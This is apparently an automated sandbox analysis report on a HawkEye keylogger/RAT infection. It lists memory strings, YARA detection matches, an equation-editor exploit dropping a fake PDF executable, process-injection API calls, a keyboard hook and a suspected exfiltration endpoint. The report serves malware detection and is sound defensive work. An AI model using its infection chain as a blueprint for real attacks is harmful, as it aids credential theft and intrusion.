Source: bhvC767.tmp.7.dr	String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: name.exe, 00000004.00000002.2156504206.0000000005C50000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2387769043.00000000082A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2175419670.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/-
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: name.exe, 00000004.00000002.2156504206.0000000005C50000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2387769043.00000000082A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2175419670.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhvC767.tmp.7.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: vbc.exe, vbc.exe, 00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1508238293&rver=6.7.6643.0&wp=l
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvC767.tmp.7.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs

.Net Code: HookKeyboard

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3bf5fa2.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3f349d2.16.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3f3adda.17.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3d2bea2.13.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3f349d2.16.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3b9e738.11.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3ba013d.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3f3c7df.15.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3d33caf.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.235347c.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3d2bea2.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3d322aa.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\name.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003685A4 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00368598 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00368580 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036DA88 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036E018 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003685B0 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003685BC NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00368670 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003686A0 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_003686AC NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00368694 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_00368688 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_0036DF60 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\AppData\Roaming\name.exe

Code function: 4_2_00A13798 CreateProcessAsUserW,

Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_002B6BED
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A048A2
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A10888
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A063AB
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042B0B1
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00428278
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042A660
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00429E00
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042BF40
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042E0C0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00429270
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042E2F8
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00425300
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042E570
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00421525
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042161E
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_004216F9
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042DA10
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042DA20
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042AB60
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00427CD0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0042CE58
